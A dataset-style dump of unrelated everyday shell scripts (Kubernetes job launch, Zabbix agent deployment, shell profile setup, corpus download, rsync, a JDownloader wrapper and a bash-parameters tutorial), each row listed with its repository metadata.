sleep 20s
kubectl create -f fabric-cli-job.yaml
echo " - [waiting 10s for cli container to create ]"
sleep 10s
echo "======================= [DONE] ========================="
kubectl logs -f $(kubectl get pod --selector io.kompose.job=cli -o name)
| true |
7f6141654bfc9d3fe6dcfa67893f41e5b5c2ff06 | Shell | hussainamir/python-snap7 | /.travis/before_install.sh | UTF-8 | 165 | 2.734375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -v
set -e
if [ "$TRAVIS_OS_NAME" = "osx" ]; then
brew install snap7
fi
if [ "$TRAVIS_OS_NAME" = "linux" ]; then
echo "nothing"
fi
| true |
7552ddc79dbd6fd884618bfda2a4faf9184daf9d | Shell | mionsan/shell | /bin/update_zabbix_agentd | UTF-8 | 807 | 3.125 | 3 | [] | no_license | #!/bin/bash
HOST=$1
CONFDIR=/etc/zabbix
USERDIR=/etc/zabbix/zabbix_agentd.d
# install zabbix agentd
#ssh ${HOST} "yum -y install php php-mysql zabbix22-agent sysstat bc"
# deploy plugin scripts
for i in `find /etc/zabbix -executable -type f`; do
scp ${i} ${HOST}:/etc/zabbix
done
# deploy conf file
scp /etc/zabbix/zabbix_agentd.conf ${HOST}:/etc/zabbix
scp -r /etc/zabbix/zabbix_agentd.d ${HOST}:/etc/zabbix
scp /root/setup/mysql/zabbix/.my.cnf ${HOST}:/var/lib/zabbix
scp -r /var/lib/zabbix/percona ${HOST}:/var/lib/zabbix
# start zabbix agentd
echo "Starting zabbix agentd"
ssh ${HOST} "/etc/init.d/zabbix-agentd restart && chkconfig zabbix-agentd on"
#chkconfig zabbix-agentd on
# check log
echo "Zabbix Agentd Logs come after here"
echo "..."
ssh ${HOST} "tail /var/log/zabbix/zabbix_agentd.log"
| true |
69ec1bf9500ad7368c444df778fe7681e5b17e30 | Shell | xue-yuan/dotfiles | /.bash_profile | UTF-8 | 1,211 | 3.109375 | 3 | [
"MIT"
] | permissive | eval "$(pyenv init --path)"
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
export PATH="$PATH:$HOME/workspace/flutter/bin"
export GOPATH=$HOME/workspace/go
export GOROOT="/usr/local/opt/go/libexec"
# export GOROOT="$(brew --prefix golang)/libexec"
export PATH="$PATH:${GOPATH}/bin:${GOROOT}/bin"
export GO111MODULE=on
export PATH="$PATH:$HOME/.rvm/bin"
export NVM_DIR="$HOME/.nvm"
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
[ -s "/usr/local/opt/nvm/nvm.sh" ] && . "/usr/local/opt/nvm/nvm.sh" --no-use # This loads nvm
[ -s "/usr/local/opt/nvm/etc/bash_completion.d/nvm" ] && . "/usr/local/opt/nvm/etc/bash_completion.d/nvm" # This loads nvm bash_completion
# The next line updates PATH for the Google Cloud SDK.
if [ -f '/Users/denon/google-cloud-sdk/path.zsh.inc' ]; then . '/Users/denon/google-cloud-sdk/path.zsh.inc'; fi
# The next line enables shell command completion for gcloud.
if [ -f '/Users/denon/google-cloud-sdk/completion.zsh.inc' ]; then . '/Users/denon/google-cloud-sdk/completion.zsh.inc'; fi
timezsh() {
shell=${1-$SHELL}
for i in $(seq 1 10); do /usr/bin/time $shell -i -c exit; done
}
| true |
3bcb45aedd2bc196ac0ebc80cb1e948ca841ff44 | Shell | vklimov1976/bash | /task01.sh | UTF-8 | 194 | 3.328125 | 3 | [] | no_license | #!/bin/bash
echo -n "Введите свое имя:"
read user_name
if [ -n "$user_name" ]; then
echo "Привет $user_name!"
exit 0
else
echo "Вы не ввели имя!"
exit 1
fi
| true |
e5612e0c2fe03fd19b02314ac25626ba4021941b | Shell | andmos/SimpleNetworkServer | /bin/lib.sh | UTF-8 | 996 | 3.890625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
export DEBIAN_FRONTEND=noninteractive
# COLORS
COL_BLUE="\x1b[34;01m"
COL_RESET="\x1b[39;49;00m"
COL_RED="\x1b[31;01m"
COL_YELLOW="\x1b[33;01m"
COL_GRAY="\x1b[0;37m"
# TEMP DIR FOR INSTALLS
temp_dir='/tmp/src'
mkdir -p $temp_dir
_redirect_stdout() {
exec > >(tee "log-$1.log")
}
_print_h1() {
printf $COL_BLUE"\n▽ $1\n"$COL_RESET
}
_print_h2() {
printf $COL_YELLOW"\n× $1\n"$COL_RESET
}
_print() {
printf $COL_GRAY"\n$1\n"$COL_RESET
}
_error() {
_print $COL_RED"Error:\n$1\n"
}
_system_installs_install() {
[[ -z "$1" ]] && return 1
_print_h2 "Install $1"
sudo DEBIAN_FRONTEND=noninteractive apt-get -qq -y -f install $1
}
_check_root() {
if [ $(/usr/bin/id -u) != "0" ]; then
_error 'Must be run by root user'
exit 0
fi
}
_cleanup_lib() {
if [ -f "./lib.sh" ]; then
rm ./lib.sh
fi
}
_note_installation() {
touch "$HOME/$1-installed"
}
_unix_time() {
now=`date`
echo `date -j -f "%a %b %d %T %Z %Y" "$now" "+%s"`
}
| true |
6c871f4af4967ba852e785c0d4e88c0df4860e0f | Shell | o2346/happy-scripts | /ggr.sh | UTF-8 | 938 | 3.53125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# --------------------------------------
# Google search from terminal
# --------------------------------------
# http://unix.stackexchange.com/questions/159166/can-i-pass-commands-to-vimperator-firefox-through-the-command-line
ggr(){
if [ $(echo $1 | egrep "^-[cfs]$") ]; then
local opt="$1"
shift
fi
local opt="safe=off&num=16"
local queries="&q=${*// /+}"
local noises="+-weblio.jp+-matome.naver.jp+-cookpad.com+-itpro.nikkeibp.co.jp+-rakuten.co.jp"
local url="https://www.google.co.jp/search?${opt}${queries}${noises}"
if [ "$(uname)" = 'Darwin' ]; then
local app="/Applications"
local c="${app}/Google Chrome.app"
local f="${app}/Firefox.app"
local s="${app}/Safari.app"
case ${opt} in
"-c") open "${url}" -a "$c";;
"-f") open "${url}" -a "$f";;
"-s") open "${url}" -a "$s";;
*) open "${url}";;
esac
else
firefox $url
fi
}
ggr $*
| true |
9ad8260377884aea4c6045b07e83e26cd5b4ad45 | Shell | maxtrem/pronouns | /scripts/shell_scripts/download_jw300.sh | UTF-8 | 329 | 2.84375 | 3 | [] | no_license | #!/bin/sh
BIN_PATH=$3
DIR=$4
L1=$1
L2=$2
echo "Downloading JW300 for languages: $L1 and $L2"
$BIN_PATH -d JW300 \
--source $L1 \
--target $L2 \
--write_mode moses \
--suppress_prompts \
--write "$DIR/jw300.$L1-$L2.$L1" "$DIR/jw300.$L1-$L2.$L2"
rm JW300_latest_xml_*
| true |
0f8116db5ea35ce7c3b3abc2301e0726d5dfe20a | Shell | sammcj/scripts | /OLD/prsync.sh | UTF-8 | 520 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# SETUP OPTIONS
export SRCDIR=$1 # "/Volumes/RAID10/music"
export DESTDIR=$2 # "/Volumes/bigdata/music"
export THREADS="8"
# RSYNC TOP LEVEL FILES AND DIRECTORY STRUCTURE
rsync -lptgoDvzd "$SRCDIR" "$DESTDIR"
# FIND ALL FILES AND PASS THEM TO MULTIPLE RSYNC PROCESSES
#cd "$SRCDIR" || exit; find . -type f -print0 | xargs -n1 -P$THREADS -I% rsync -r -numeric-ids -e "ssh -T -o Compression=no -x" % "$DESTDIR"%
cd $SRCDIR; find . -type f | xargs -n1 -P$THREADS -I% rsync -r %remotehost:/$DESTDIR/%
| true |
f3c290869e7494705ceee4dc09e404746779280d | Shell | flathub/org.jdownloader.JDownloader | /jd-wrapper.sh | UTF-8 | 437 | 3.125 | 3 | [] | no_license | #!/bin/bash
JDDIR=${XDG_DATA_HOME}/jdownloader
JDSETUP=${XDG_CACHE_HOME}/JD2Setup.sh
if [ ! -f ${JDDIR}/JDownloader.jar ]; then
install -Dm755 /app/extra/JD2Setup.sh ${JDSETUP}
${JDSETUP} -q -dir ${JDDIR}/tmp | zenity --progress --text="Installing JDownloader" --pulsate --no-cancel --auto-close
mv ${JDDIR}/tmp/JDownloader.jar ${JDDIR}
rm -rf ${JDSETUP} ${JDDIR}/tmp
fi
exec java -jar ${JDDIR}/JDownloader.jar "${@}"
| true |
14f241236e63deab37223adc21292ef03d4ed6ea | Shell | pengjia-git/code | /shell_script/astyle.sh | UTF-8 | 185 | 2.65625 | 3 | [] | no_license | #! /bin/bash
for f in $(find temp -name '*.c' -or -name '*.h' -type f)
do
#astyle --style=ansi --indent=spaces=4 -M80 -p -D -H -c -w -n $f
astyle --style=ansi -bps4 -M80 -w $f
done
| true |
a5e25f67792e6e6f49fc45da6b26e5bf5e58b766 | Shell | NoelTejeda/Bash | /prácticas/parametros.sh | UTF-8 | 542 | 3.171875 | 3 | [] | no_license | #echo el primer parámetro es $1
#echo el número de parámetros ha sido $#
#echo todos los parámetros son $*
#-------------------------
# $n = la información de un parámetro en concreto, siendo n un número del parámetro
# $* = todos los parámetros. es una lista con un elemento por cada parametro recibido
# $# = el número de parametros con los que se ha invocado el script.
:'echo estos son los parametros a colocar
echo $1
echo $2
echo $9
echo ${10}'
echo "el nombre del script es: $1 $2 $3 $4 $5"
echo $#
echo $?
echo $*
echo $@ | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.